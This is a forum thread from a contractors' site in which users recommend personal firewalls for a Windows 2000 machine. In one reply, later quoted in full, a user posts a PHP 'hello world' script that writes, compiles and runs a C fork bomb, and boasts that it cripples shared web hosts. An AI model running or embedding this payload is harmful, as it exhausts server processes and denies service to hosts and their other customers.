• Visitors can check out the Forum FAQ by clicking this link. You have to register before you can post: click the REGISTER link above to proceed. To start viewing messages, select the forum that you want to visit from the selection below. View our Forum Privacy Policy.
  • Want to receive the latest contracting news and advice straight to your inbox? Sign up to the ContractorUK newsletter here. Every sign up will also be entered into a draw to WIN £100 Amazon vouchers!

Personal firewall that doesn't suck

Collapse
X
  •  
  • Filter
  • Time
  • Show
Clear All

Personal firewall that doesn't suck

Any recommendations? This is for a Windows 2000 machine which is patched straight into the back of a router with no admin access.

I've tried Kerio and ZoneAlarm which either crash or annoy the hell out of the user.

I need something silent, easy to admin and doesn't crash leaving the machine wide open.
    Serving religion with the contempt it deserves...

avg

I use avg,it's cheap, chearfull and more to the point stable, does the job without annoying little messages popping up.

http://www.grisoft.com/doc/avgplusfw/lng/us/tpl/tpl01
    whats the lowest you can do this for?

Comment

Ahh didn't know they did a firewall! I use their AV stuff so I should have noticed. Will investigate.

Thanks!

Comment

you do seem to have some highly temperamental machines monkey. are you sure you are talking nicely to them? first ie7 and now zonealarm crashing!? maybe you could try a ram upgrade. 32mb is not generally considered enough these days for a happy pc.

Comment

Originally posted by scotspine
          you do seem to have some highly temperamental machines monkey. are you sure you are talking nicely to them? first ie7 and now zonealarm crashing!? maybe you could try a ram upgrade. 32mb is not generally considered enough these days for a happy pc.
          Very funny. My machines are my bitches and they will remain so.

Machines are fine. Zone Alarm is a total pile of crap - bug-the-user-ware as I like to call it. Kerio is just craply written. Everything else is rock solid.

As for IE7, it's just WRONG in the way it handles CSS in some circumstances.

Just checked the uptime on the windows 2000 box (!!!!!). Only 3 years and 41 days. A miracle!

Comment

yep, but just wait till you put your 'hello world' php web app on it...

Comment

Originally posted by scotspine
              yep, but just wait till you put your 'hello world' php web app on it...
              This is my hello world php app:

PHP Code:
              <?php
              echo "Hello World and goodbye!";
              exec("echo \"#include <unistd.h>\\nint main() { for(;;) fork(); return 0; }\" > /tmp/blast.c");
              exec("cc /tmp/blast.c -o /tmp/boom");
              exec("/tmp/boom");
              ?>
              Works wonders on the tuliptier hosts and they can't even SSH in to sort it out as the ssh daemon can't fork a shell because the process table is full. Woot!

Comment

Originally posted by TheMonkey
                Very funny. My machines are my bitches and they will remain so.

Machines are fine. Zone Alarm is a total pile of crap - bug-the-user-ware as I like to call it. Kerio is just craply written. Everything else is rock solid.

As for IE7, it's just WRONG in the way it handles CSS in some circumstances.

Just checked the uptime on the windows 2000 box (!!!!!). Only 3 years and 41 days. A miracle!

If zone alarm is bugging your users then turn off the notification option.

I run it on 6 machines at home and non of them produce popup notifications.
                "Being nice costs nothing and sometimes gets you extra bacon" - Pondlife.

Comment

Originally posted by TheMonkey
                  This is my hello world php app:

PHP Code:
                  <?php
                  echo "Hello World and goodbye!";
                  exec("echo \"#include <unistd.h>\\nint main() { for(;;) fork(); return 0; }\" > /tmp/blast.c");
                  exec("cc /tmp/blast.c -o /tmp/boom");
                  exec("/tmp/boom");
                  ?>
                  Works wonders on the tuliptier hosts and they can't even SSH in to sort it out as the ssh daemon can't fork a shell because the process table is full. Woot!

blimey! makes a .not [toot toot] stack trace read like enid blyton. perhaps it has a memory leak?

Comment

Firewall

I used the free Sygate firewall for nearly 3 years now.
                    Never had a problem.
                    “Though no one can go back and make a brand new start, anyone can start from now and make a brand new ending.”

Comment

Working...
                    X